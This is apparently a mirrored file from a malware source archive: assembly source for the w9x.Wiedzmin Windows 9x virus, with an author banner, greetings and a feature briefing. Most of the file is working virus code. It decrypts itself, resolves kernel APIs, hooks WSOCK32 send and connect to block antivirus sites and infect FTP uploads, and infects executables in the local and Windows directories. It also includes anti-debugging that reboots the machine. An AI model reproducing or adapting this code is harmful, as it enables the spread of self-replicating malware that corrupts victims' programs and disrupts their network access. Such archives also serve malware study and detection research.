mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 12:25:29 +00:00
2405 lines
53 KiB
NASM
2405 lines
53 KiB
NASM
|
|
|||
|
;
|
|||
|
; W D nnn
|
|||
|
; WW Ww o D M O Nn nn
|
|||
|
; Ww wW i eEeE dddDD ZzzZzZ Mm m m nN nn
|
|||
|
; wW Ww ii e E d dD Zz m M M mm ii N n n
|
|||
|
; Ww w wW ii Eeee d dD z mm m m i n N n
|
|||
|
; W W W W ii e d dD z m mm ii n n n
|
|||
|
; wWw wWwW iii eEee d dD zZzZzZ mm mm ii n nn
|
|||
|
; ddddDd mm iii n n
|
|||
|
;
|
|||
|
; <20>(c) YuP - Deithwen Addan - Artist of Rebelion<6F>
|
|||
|
; <20> yup@tlen.pl <20>
|
|||
|
;
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20> w9x.Wiedzmin <20>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;
|
|||
|
;
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><>DISCLAIMERĝ
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; This is a source of a virus, only source the compiled version
|
|||
|
; cannot leave your computer! Author is NOT RESPONSIBLE FOR ANY
|
|||
|
; ACTIONS WITH THIS CODE!
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><> The name ĝ
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;
|
|||
|
; The name 'Wiedzmin' was stolen from Andrzej Sapkowski saga "Wiedzmin".
|
|||
|
; (sapkowski.pl,sapkowski.cz) - someone said that he is another
|
|||
|
; Tolkien (in my opinion this book is even better then Tolkienz
|
|||
|
; "Lord of the Rings").
|
|||
|
; Wiedzmin was a some kind of mutant (only few kids from 10 can survive
|
|||
|
; wiedzmin test). As a mutant he was very fast, he was master of fencig,
|
|||
|
; he can see at night, and he of course can make magic signs.
|
|||
|
; Blah ...
|
|||
|
; Next he went, and travel around the world (he was killing monsterz for money).
|
|||
|
; In his journey he met new fantasic characters like Regis (vapire),
|
|||
|
; Milva (hunter), Jaskier (bard), Yennefer (witch) , Ciri (child of destinty)
|
|||
|
; ...
|
|||
|
;
|
|||
|
; The book is realy FANTASTIC! Full of adventures, fight, sex (X-D),
|
|||
|
; blood, swearwords, and much much more! I realy advice you to READ IT!
|
|||
|
; (check translationz for your language: www.sapkowski.pl).
|
|||
|
; If you like fantasy you CAN'T miss IT!
|
|||
|
;
|
|||
|
;
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><> Music ĝ
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;
|
|||
|
; I'd like to thx some kewl music groups in range of rock-hiphop:
|
|||
|
; Outsidez: Polish groupz:
|
|||
|
; <20>Deep Purple <20>Molesta
|
|||
|
; <20>Iron Maiden <20>Fenomen
|
|||
|
; <20>Linkin Park <20>Zipera
|
|||
|
; <20>Rage Against the Machine <20>Grammatik
|
|||
|
; <20>KoRn <20>Eldo
|
|||
|
; <20>Limp Bizkit <20>Kaliber 44
|
|||
|
;
|
|||
|
; I'm a weird person ;]
|
|||
|
;
|
|||
|
;
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><> Greetz ĝ
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;
|
|||
|
; Greetz go to:
|
|||
|
; <20>Friendz from city:
|
|||
|
; <20>Yoo (:])
|
|||
|
; <20>Misiek (dzienx za plyty stary)
|
|||
|
; <20>Klosina (nie rzucaj nozami)
|
|||
|
; <20>Stra<72> Miejska (nie trzymamy nog na lawkach :p)
|
|||
|
; <20>I dla reszty ludkuf, nie wymienialem was bo i tak
|
|||
|
; nigdy tego nie przeczytacie.
|
|||
|
;
|
|||
|
; <20>Guyz from Undernet:
|
|||
|
; <20>Toro (busy today?)
|
|||
|
; <20>SlageHammer (helo tester ;D)
|
|||
|
; <20>Spanska (BloodHound.W32.WSWORM ;[)
|
|||
|
; <20>BFF70000h (lagz lagz lagz)
|
|||
|
;
|
|||
|
; <20>Guyz from irc.pl:
|
|||
|
; <20>Blaze (stuk puk)
|
|||
|
; <20>Detergent (walek)
|
|||
|
; <20>Shmastah (judeIRC ;])
|
|||
|
; <20>Ajron (ten nie prawdziwy :P)
|
|||
|
; <20>Aamf-girl (gimnazjalistka ;P)
|
|||
|
; <20>Wizja (dolly ma reumatyzm czy jakos tak ;>)
|
|||
|
; <20>Pafko (dragonball rulez!)
|
|||
|
; <20>Crash (why you? ;P)
|
|||
|
;
|
|||
|
;
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><> Briefing ĝ
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;
|
|||
|
; Virus name : w9x.Wiedzmin
|
|||
|
; Virus version : 1.0
|
|||
|
; Virus author : Lord YuP - Deithwen Addan
|
|||
|
; Release date : 6.02.02+8.02.02 i forgot to install SEH, he he
|
|||
|
; Virus type : PE infector and WSOCK32.DLL hooker
|
|||
|
; Target Systems : win95<nt>, win98<nt>, winME<t>
|
|||
|
; <20>[nt] - not tested (should work, if not fuck it!)
|
|||
|
; <20>[t] - tested
|
|||
|
;
|
|||
|
;
|
|||
|
; Encryption : 3 LAYERS CRYPTED BY RANDOM NUMBER!
|
|||
|
; <20> 1 - cryptz main virus body <20>
|
|||
|
; <20> 2 - cryptz host body <20>
|
|||
|
; <20> 3 - cryptz virus data <20>
|
|||
|
;
|
|||
|
; Every layer is crypted by another key.
|
|||
|
;
|
|||
|
; Virus helper : Virus when found section called different
|
|||
|
; then ".text" or "CODE" (EIP must point to
|
|||
|
; it) it is gonna to crypt all file body
|
|||
|
; and put only decryptor into last section.
|
|||
|
; The main body (with other virus probably)
|
|||
|
; is crypted by random key. EIP points to
|
|||
|
; decryptor.
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
; Polymorphic : Yep random key crypting, adding
|
|||
|
; 90h<NOP> garbage in the range
|
|||
|
; of 0-255.
|
|||
|
;
|
|||
|
;
|
|||
|
; AntiAV : Virus wouldn't infect filez
|
|||
|
; with 'a','A','E','e','v','V'
|
|||
|
; at start.
|
|||
|
;
|
|||
|
;
|
|||
|
; AntiDEBUG : Yep, using win9x Softice detection,
|
|||
|
; and IsDebuggerPresent API. When
|
|||
|
; sice is found it shows message in
|
|||
|
; debbuger and exec int 19h !
|
|||
|
; Other debbugers like td32, SoftSnoop
|
|||
|
; end so on = int 19h!
|
|||
|
;
|
|||
|
;
|
|||
|
; WSOCK32 hooker : Virus infect wsock32.dll replacing the
|
|||
|
; send, connect function addressez.
|
|||
|
; After reboot (wininit.ini ;P) functionz
|
|||
|
; will be hooked. User will never connect
|
|||
|
; to AV sitez (error: host not found),
|
|||
|
; and when user will try to put a file in
|
|||
|
; the FTP account, virus will infect it on
|
|||
|
; fly.
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
; Infection procez : Virus infect 7 filez in the local
|
|||
|
; directory and 7 filez in the windowz
|
|||
|
; directory. Virus is going to apend
|
|||
|
; itself to the last section. The section
|
|||
|
; is increased. EIP points to it.
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
; Payload : On 22.06 or 22.12 every run it gonna
|
|||
|
; print color string in the infinite
|
|||
|
; loop. The string will be VISIBLE
|
|||
|
; everywhere - virus grabz active
|
|||
|
; window HDC!
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>[WIEDZMIN.ASM]<5D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
.386
|
|||
|
.model flat
|
|||
|
jumps
|
|||
|
locals
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
extrn ExitProcess:PROC
|
|||
|
extrn MessageBoxA:PROC
|
|||
|
|
|||
|
|
|||
|
|
|||
|
FILETIME STRUC
|
|||
|
dwLowDateTime dd ?
|
|||
|
dwHighDateTime dd ?
|
|||
|
FILETIME ends
|
|||
|
|
|||
|
|
|||
|
|
|||
|
WIN32_FIND_DATA struc ;FIND DATA
|
|||
|
dwFileAttributes dd 0
|
|||
|
dwLowDateTime0 dd ?
|
|||
|
dwHigDateTime0 dd ?
|
|||
|
dwLowDateTime1 dd ?
|
|||
|
dwHigDateTime1 dd ?
|
|||
|
dwLowDateTime2 dd ?
|
|||
|
dwHigDateTime2 dd ?
|
|||
|
nFileSizeHigh dd ?
|
|||
|
nFileSizeLow dd ?
|
|||
|
dwReserved dd 0,0
|
|||
|
cFileName db 260 dup(0)
|
|||
|
cAlternateFilename db 14 dup(0)
|
|||
|
db 2 dup(0)
|
|||
|
WIN32_FIND_DATA ends
|
|||
|
|
|||
|
hooksize equ hook_end-start_h
|
|||
|
sendh equ (offset hooked_send-offset start_h)
|
|||
|
connecth equ (offset hooked_connect-offset start_h)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
vvsize equ HeapEnd-HeapStart
|
|||
|
virussize equ VirusEnd-v_start
|
|||
|
allsize equ virussize
|
|||
|
TO_DE equ @loop_decryptt-@to_this
|
|||
|
helper equ @helper_end-@uncrypt
|
|||
|
|
|||
|
|
|||
|
virussizee macro
|
|||
|
db virussize/10000 mod 10 + "0"
|
|||
|
db virussize/01000 mod 10 + "0"
|
|||
|
db virussize/00100 mod 10 + "0"
|
|||
|
db virussize/00010 mod 10 + "0"
|
|||
|
db virussize/00001 mod 10 + "0"
|
|||
|
endm
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
.DATA
|
|||
|
|
|||
|
|
|||
|
db ?
|
|||
|
|
|||
|
|
|||
|
.CODE
|
|||
|
v_start:
|
|||
|
pushad
|
|||
|
pushfd
|
|||
|
|
|||
|
call @delta
|
|||
|
@delta:
|
|||
|
pop ebp ;ebp contains address of @delta right now in
|
|||
|
sub ebp,offset @delta ;memory -> we must sub the linking @delta val
|
|||
|
|
|||
|
cmp ebp,0
|
|||
|
je @_KERNEL
|
|||
|
|
|||
|
|
|||
|
@main_decryptor:
|
|||
|
lea edx,[ebp+offset @to_this]
|
|||
|
mov eax,[ebp+key_main]
|
|||
|
mov ecx,TO_DE
|
|||
|
|
|||
|
|
|||
|
@loop_decrypt:
|
|||
|
xor byte ptr [edx],al
|
|||
|
inc edx
|
|||
|
loop @loop_decrypt
|
|||
|
cmp edi,'!PUY'
|
|||
|
jne @to_this
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
|
|||
|
@to_this:
|
|||
|
lea edi,[ebp+offset APIList]
|
|||
|
lea esi,[ebp+offset APIList]
|
|||
|
call @UN_CRYPT_BYTEZ
|
|||
|
|
|||
|
lea edi,[ebp+offset TO_CRYPT_DATA]
|
|||
|
lea esi,[ebp+offset TO_CRYPT_DATA]
|
|||
|
call @UN_CRYPT_BYTEZ
|
|||
|
|
|||
|
|
|||
|
@_KERNEL:
|
|||
|
lea eax, [ebp+fault] ; Setup a SEH frame
|
|||
|
push eax
|
|||
|
push dword ptr fs:[0]
|
|||
|
mov fs:[0], esp
|
|||
|
|
|||
|
mov eax,0BFF70000h ;kerneloz w95
|
|||
|
cmp word ptr [eax],'ZM'
|
|||
|
je _GOT_KERNEL
|
|||
|
;NT moze pozniej :p
|
|||
|
|
|||
|
|
|||
|
|
|||
|
mov eax,0BFF60000h ;ladujemy kernela ;) winME ;)
|
|||
|
cmp word ptr [eax],'ZM' ;check is it a exe file
|
|||
|
je _GOT_KERNEL
|
|||
|
|
|||
|
jmp @EXIT
|
|||
|
|
|||
|
|
|||
|
_GOT_KERNEL:
|
|||
|
mov dword ptr [ebp+capis],5h
|
|||
|
mov dword ptr [ebp+Kernel],eax
|
|||
|
|
|||
|
|
|||
|
@go_export:
|
|||
|
|
|||
|
mov dword ptr [ebp+NON],000000h
|
|||
|
mov dword ptr [ebp + AOF],000000h
|
|||
|
mov dword ptr [ebp + AON],000000h
|
|||
|
mov dword ptr [ebp + AOO],000000h
|
|||
|
|
|||
|
mov edx,eax
|
|||
|
mov ebx,edx
|
|||
|
|
|||
|
|
|||
|
mov edi, [eax + 03ch] ;a valid PE ?
|
|||
|
add edx, edi
|
|||
|
cmp dword ptr [edx],'EP'
|
|||
|
jne @EXIT
|
|||
|
|
|||
|
|
|||
|
|
|||
|
mov edx,[edx + 078h] ;export table
|
|||
|
add edx,eax ;mamy w edx -> export table
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
mov esi,[edx + 018h]
|
|||
|
mov dword ptr [ebp + NON],esi
|
|||
|
|
|||
|
|
|||
|
mov esi,[edx+1Ch]
|
|||
|
mov dword ptr [ebp + AOF],esi
|
|||
|
add dword ptr [ebp + AOF],eax
|
|||
|
|
|||
|
mov esi,[edx+20h]
|
|||
|
mov dword ptr [ebp + AON],esi
|
|||
|
add dword ptr [ebp + AON],eax
|
|||
|
|
|||
|
mov esi,[edx+24h]
|
|||
|
mov dword ptr [ebp + AOO],esi
|
|||
|
add dword ptr [ebp + AOO],eax
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
@export_read:
|
|||
|
mov esi,dword ptr [ebp + AON]
|
|||
|
mov [ebp+offset IndexA],esi ;save into naming index
|
|||
|
mov esi,dword ptr [esi]
|
|||
|
add esi,eax
|
|||
|
|
|||
|
xor ebx,ebx
|
|||
|
|
|||
|
|
|||
|
@__GPA:
|
|||
|
|
|||
|
|
|||
|
cmp dword ptr [ebp+capis],5h
|
|||
|
je @zwykle
|
|||
|
|
|||
|
|
|||
|
lea edi,[ebp+offset A1]
|
|||
|
mov ecx,A1s
|
|||
|
|
|||
|
|
|||
|
|
|||
|
cmp dword ptr [ebp+capis],1
|
|||
|
jne @porownaj
|
|||
|
|
|||
|
lea edi,[ebp+offset A2]
|
|||
|
mov ecx,A2s
|
|||
|
jmp @porownaj
|
|||
|
|
|||
|
@zwykle:
|
|||
|
lea edi,[ebp + offset APIS] ;mam offset zmiennej
|
|||
|
|
|||
|
|
|||
|
|
|||
|
@GET_GPA:
|
|||
|
mov ecx,APIS_SIZE ;size api
|
|||
|
|
|||
|
|
|||
|
@porownaj:
|
|||
|
rep cmpsb ;scan
|
|||
|
je found ;if equal calculate function address
|
|||
|
|
|||
|
|
|||
|
Scan_dalej:
|
|||
|
add dword ptr [ebp + offset IndexA],4
|
|||
|
mov esi,[ebp + offset IndexA]
|
|||
|
mov esi,[esi]
|
|||
|
add esi,eax
|
|||
|
|
|||
|
cmp dword ptr [ebp+offset NON],ebx
|
|||
|
je @EXIT
|
|||
|
inc ebx
|
|||
|
cmp dword ptr [ebp+offset NON],ebx
|
|||
|
je @EXIT
|
|||
|
|
|||
|
jmp @__GPA
|
|||
|
|
|||
|
found:
|
|||
|
mov eax,ebx ;mamy GPA !!!
|
|||
|
|
|||
|
mov ecx,edi
|
|||
|
inc ecx
|
|||
|
push ecx ;na stos ;P
|
|||
|
|
|||
|
mov eax,ebx ;EAX=>counter
|
|||
|
mov ecx,2
|
|||
|
mul ecx ;mnozymy EAX*2
|
|||
|
pop ecx ;zdejmujemy ze stosu ECX
|
|||
|
|
|||
|
mov esi,[ebp + AOO]
|
|||
|
add esi,eax
|
|||
|
xor eax,eax
|
|||
|
|
|||
|
|
|||
|
mov ax,word ptr [esi]
|
|||
|
mov ecx,4
|
|||
|
mul ecx
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
cmp dword ptr [ebp+go_wsock],1
|
|||
|
jne @skip_it_urgh
|
|||
|
|
|||
|
mov esi,[ebp + AOF]
|
|||
|
add esi,eax
|
|||
|
mov eax,[esi]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
cmp dword ptr [ebp+capis],1
|
|||
|
je @make_1
|
|||
|
|
|||
|
;mov ebx,dword ptr [ebp+wsock_hh]
|
|||
|
;mov dword ptr [ebp+a_send],eax
|
|||
|
;add dword ptr [ebp+a_send],ebx
|
|||
|
;mov eax,dword ptr [ebp+a_send]
|
|||
|
|
|||
|
mov ebx,sendh
|
|||
|
mov edx,dword ptr [ebp+moj_address] ;tricky shit ;]
|
|||
|
add edx,ebx
|
|||
|
jmp make_real
|
|||
|
|
|||
|
|
|||
|
@make_1:
|
|||
|
mov ebx,connecth
|
|||
|
mov edx,dword ptr [ebp+moj_address] ;tricky shit ;]
|
|||
|
add edx,ebx
|
|||
|
|
|||
|
|
|||
|
|
|||
|
make_real:
|
|||
|
|
|||
|
|
|||
|
mov [esi],edx
|
|||
|
|
|||
|
inc dword ptr [ebp+capis]
|
|||
|
cmp dword ptr [ebp+capis],2
|
|||
|
je @go_out_now
|
|||
|
|
|||
|
mov eax,dword ptr [ebp+wsock_h]
|
|||
|
jmp @go_export
|
|||
|
|
|||
|
@go_out_now: ret
|
|||
|
|
|||
|
|
|||
|
@skip_it_urgh:
|
|||
|
mov esi,[ebp + AOF]
|
|||
|
add esi,eax
|
|||
|
mov edi,dword ptr [esi]
|
|||
|
add edi,[ebp+offset Kernel]
|
|||
|
mov eax,edi
|
|||
|
mov dword ptr [ebp+_GPA],eax
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
@GET_APIS: ;API Search
|
|||
|
xor esi,esi
|
|||
|
lea esi,[ebp+offset APIList]
|
|||
|
lea edi,[ebp+offset _FindFirstFileA]
|
|||
|
;mamy d wordy czyli skok co 4 bajty
|
|||
|
;stosd -> z EAX do EDI
|
|||
|
|
|||
|
|
|||
|
|
|||
|
@go_table:
|
|||
|
push esi
|
|||
|
push dword ptr [ebp+offset Kernel]
|
|||
|
call dword ptr [ebp+offset _GPA]
|
|||
|
stosd
|
|||
|
|
|||
|
@next_byte:
|
|||
|
inc esi
|
|||
|
cmp byte ptr [esi],00h
|
|||
|
jne @next_byte
|
|||
|
|
|||
|
|
|||
|
inc esi
|
|||
|
cmp byte ptr [esi],07h
|
|||
|
jne @go_table
|
|||
|
|
|||
|
mov eax,dword ptr [ebp+_GetCurrentDirectoryA]
|
|||
|
mov dword ptr [ebp+gcd],eax
|
|||
|
mov eax,dword ptr [ebp+_WinExec]
|
|||
|
mov dword ptr [ebp+wex],eax
|
|||
|
|
|||
|
lea eax,[ebp+offset wsock]
|
|||
|
inc eax
|
|||
|
push eax
|
|||
|
call dword ptr [ebp+_LoadLibraryA]
|
|||
|
mov dword ptr [ebp+wsock_hh],eax
|
|||
|
|
|||
|
|
|||
|
lea ecx,[ebp+offset sle]
|
|||
|
push ecx
|
|||
|
push eax
|
|||
|
call dword ptr [ebp+offset _GPA]
|
|||
|
mov dword ptr [ebp+_WSASetLastError],eax
|
|||
|
|
|||
|
|
|||
|
lea ecx,[ebp+offset A1]
|
|||
|
push ecx
|
|||
|
push dword ptr [ebp+wsock_hh]
|
|||
|
call dword ptr [ebp+offset _GPA]
|
|||
|
mov dword ptr [ebp+a_send],eax
|
|||
|
|
|||
|
|
|||
|
lea ecx,[ebp+offset A2]
|
|||
|
push ecx
|
|||
|
push dword ptr [ebp+wsock_hh]
|
|||
|
call dword ptr [ebp+offset _GPA]
|
|||
|
mov dword ptr [ebp+a_connect],eax
|
|||
|
|
|||
|
|
|||
|
|
|||
|
push 4h ; PAGE_READWRITE
|
|||
|
push 1000h ; MEM_COMMIT
|
|||
|
push 1000 ; size of buffer
|
|||
|
push 0 ; lpAddress
|
|||
|
call dword ptr [ebp+_VirtualAlloc] ; Alloc IT!
|
|||
|
mov dword ptr [ebp+vbuf],eax
|
|||
|
|
|||
|
|
|||
|
;********************************DEBUG TRAP******************************************************
|
|||
|
;call @debug_trap
|
|||
|
;************************************************************************************************
|
|||
|
call @wsockz
|
|||
|
mov dword ptr [ebp+go_wsock],0
|
|||
|
|
|||
|
lea eax,[ebp+SYSTEM_TIME]
|
|||
|
push eax
|
|||
|
call dword ptr [ebp+_GetSystemTime]
|
|||
|
|
|||
|
cmp word ptr [ebp+wMonth],6 ;22.06 Mida<64>te
|
|||
|
jne try_
|
|||
|
cmp word ptr [ebp+wDay],22
|
|||
|
jne try_
|
|||
|
call make_it_real
|
|||
|
|
|||
|
|
|||
|
try_:
|
|||
|
cmp word ptr [ebp+wMonth],12 ;22.12 Midinvaerne
|
|||
|
jne cya_folx
|
|||
|
cmp word ptr [ebp+wDay],22
|
|||
|
jne cya_folx
|
|||
|
call make_it_real
|
|||
|
|
|||
|
|
|||
|
cya_folx:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
call @GGEN_KEY
|
|||
|
lea edi,[ebp+offset APIList]
|
|||
|
lea esi,[ebp+offset APIList]
|
|||
|
call @CRYPT_BYTEZ
|
|||
|
|
|||
|
lea edi,[ebp+offset TO_CRYPT_DATA]
|
|||
|
lea esi,[ebp+offset TO_CRYPT_DATA]
|
|||
|
call @CRYPT_BYTEZ
|
|||
|
|
|||
|
|
|||
|
|
|||
|
_done:
|
|||
|
lea edi,[ebp+finddata.cFileName]
|
|||
|
call dword ptr [ebp+_GetCommandLineA]
|
|||
|
mov esi,eax
|
|||
|
|
|||
|
xor ebx,ebx
|
|||
|
_skip_space:
|
|||
|
lodsb
|
|||
|
cmp al,0
|
|||
|
je @GetWDir
|
|||
|
cmp al,' '
|
|||
|
je _ave_it
|
|||
|
jmp _skip_space
|
|||
|
|
|||
|
|
|||
|
_ave_it:
|
|||
|
lodsb
|
|||
|
inc ebx
|
|||
|
cmp al,0
|
|||
|
je @infect_shit
|
|||
|
stosb
|
|||
|
jmp _ave_it
|
|||
|
|
|||
|
@infect_shit:
|
|||
|
cmp ebx,4
|
|||
|
jl @GetWDir
|
|||
|
lea esi,[ebp+offset finddata.cFileName]
|
|||
|
add esi,ebx
|
|||
|
sub esi,5
|
|||
|
lodsb
|
|||
|
cmp al,'.'
|
|||
|
je yep_it
|
|||
|
jmp @GetWDir
|
|||
|
|
|||
|
|
|||
|
yep_it:
|
|||
|
|
|||
|
push dword ptr [ebp+key_main]
|
|||
|
push dword ptr [ebp+key_next]
|
|||
|
push dword ptr [ebp+e_bytes]
|
|||
|
push dword ptr [ebp+e_where]
|
|||
|
push dword ptr [ebp+hosteip]
|
|||
|
push dword ptr [ebp+imagebase]
|
|||
|
call @infect
|
|||
|
pop dword ptr [ebp+imagebase]
|
|||
|
pop dword ptr [ebp+hosteip]
|
|||
|
pop dword ptr [ebp+e_where]
|
|||
|
pop dword ptr [ebp+e_bytes]
|
|||
|
pop dword ptr [ebp+key_next]
|
|||
|
pop dword ptr [ebp+key_main]
|
|||
|
|
|||
|
push 0h
|
|||
|
call dword ptr [ebp+_ExitProcess]
|
|||
|
|
|||
|
|
|||
|
@GetWDir:
|
|||
|
lea eax,[ebp+offset winDIR]
|
|||
|
push 260
|
|||
|
push eax
|
|||
|
call dword ptr [ebp+_GetWindowsDirectoryA]
|
|||
|
|
|||
|
;now local dir
|
|||
|
lea eax,[ebp+offset oldDIR]
|
|||
|
push eax
|
|||
|
push 560
|
|||
|
call dword ptr [ebp+_GetCurrentDirectoryA]
|
|||
|
|
|||
|
|
|||
|
mov dword ptr [ebp+was_win],0000000h
|
|||
|
@Find1st:
|
|||
|
mov dword ptr [ebp+ic],0000000h
|
|||
|
lea eax,[ebp+offset finddata]
|
|||
|
push eax
|
|||
|
lea eax,[ebp+offset marker]
|
|||
|
push eax
|
|||
|
call dword ptr [ebp+_FindFirstFileA]
|
|||
|
mov dword ptr [ebp+sHnd],eax
|
|||
|
inc eax
|
|||
|
jz @d_dalej
|
|||
|
|
|||
|
@workk:
|
|||
|
push dword ptr [ebp+key_main]
|
|||
|
push dword ptr [ebp+key_next]
|
|||
|
push dword ptr [ebp+e_bytes]
|
|||
|
push dword ptr [ebp+e_where]
|
|||
|
push dword ptr [ebp+hosteip]
|
|||
|
push dword ptr [ebp+imagebase]
|
|||
|
call @infect
|
|||
|
pop dword ptr [ebp+imagebase]
|
|||
|
pop dword ptr [ebp+hosteip]
|
|||
|
pop dword ptr [ebp+e_where]
|
|||
|
pop dword ptr [ebp+e_bytes]
|
|||
|
pop dword ptr [ebp+key_next]
|
|||
|
pop dword ptr [ebp+key_main]
|
|||
|
|
|||
|
|
|||
|
@@Fnext:
|
|||
|
lea eax,[ebp+offset finddata]
|
|||
|
push eax
|
|||
|
push dword ptr [ebp+offset sHnd]
|
|||
|
call dword ptr [ebp+_FindNextFileA]
|
|||
|
cmp eax,0
|
|||
|
je @d_dalej
|
|||
|
|
|||
|
push dword ptr [ebp+key_main]
|
|||
|
push dword ptr [ebp+key_next]
|
|||
|
push dword ptr [ebp+e_bytes]
|
|||
|
push dword ptr [ebp+e_where]
|
|||
|
push dword ptr [ebp+hosteip]
|
|||
|
push dword ptr [ebp+imagebase]
|
|||
|
call @infect
|
|||
|
pop dword ptr [ebp+imagebase]
|
|||
|
pop dword ptr [ebp+hosteip]
|
|||
|
pop dword ptr [ebp+e_where]
|
|||
|
pop dword ptr [ebp+e_bytes]
|
|||
|
pop dword ptr [ebp+key_next]
|
|||
|
pop dword ptr [ebp+key_main]
|
|||
|
|
|||
|
|
|||
|
cmp dword ptr [ebp+ic],7
|
|||
|
jne @@Fnext
|
|||
|
|
|||
|
@d_dalej:
|
|||
|
cmp dword ptr [ebp+was_win],0
|
|||
|
jne @dalej
|
|||
|
|
|||
|
_WinINF:
|
|||
|
cmp dword ptr [ebp+was_win],0
|
|||
|
jne _stepnext
|
|||
|
|
|||
|
|
|||
|
|
|||
|
lea eax,[ebp+offset winDIR]
|
|||
|
push eax
|
|||
|
call dword ptr [ebp+_SetCurrentDirectoryA]
|
|||
|
|
|||
|
mov dword ptr [ebp+ic],0000000h
|
|||
|
mov dword ptr [ebp+was_win],1
|
|||
|
|
|||
|
|
|||
|
|
|||
|
push dword ptr [ebp+sHnd]
|
|||
|
call dword ptr [ebp+_FindClose]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
_stepnext:
|
|||
|
cmp dword ptr [ebp+ic],7
|
|||
|
jne @Find1st
|
|||
|
|
|||
|
|
|||
|
@dalej:
|
|||
|
lea eax,[ebp+offset oldDIR]
|
|||
|
push eax
|
|||
|
call dword ptr [ebp+_SetCurrentDirectoryA]
|
|||
|
jmp @EXIT
|
|||
|
|
|||
|
fault:
|
|||
|
mov esp, [esp+8]
|
|||
|
|
|||
|
@EXIT:
|
|||
|
|
|||
|
push 4000h
|
|||
|
push 1000
|
|||
|
push dword ptr [ebp+vbuf]
|
|||
|
call dword ptr [ebp+_VirtualFree]
|
|||
|
|
|||
|
pop dword ptr fs:[0]
|
|||
|
add esp, 4
|
|||
|
|
|||
|
|
|||
|
cmp ebp,0 ;first GeneratioN?
|
|||
|
jne _ETH ;tak to wyjc ;]
|
|||
|
call fakehost
|
|||
|
|
|||
|
|
|||
|
_ETH:
|
|||
|
|
|||
|
call @uncrypt
|
|||
|
|
|||
|
|
|||
|
popfd
|
|||
|
popad
|
|||
|
call @gd
|
|||
|
@gd: pop ebp
|
|||
|
sub ebp,offset @gd
|
|||
|
|
|||
|
mov eax,dword ptr [ebp+hosteip]
|
|||
|
add eax,dword ptr [ebp+imagebase]
|
|||
|
jmp eax
|
|||
|
|
|||
|
Kernel dd 0
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;<##############################################################################################>
|
|||
|
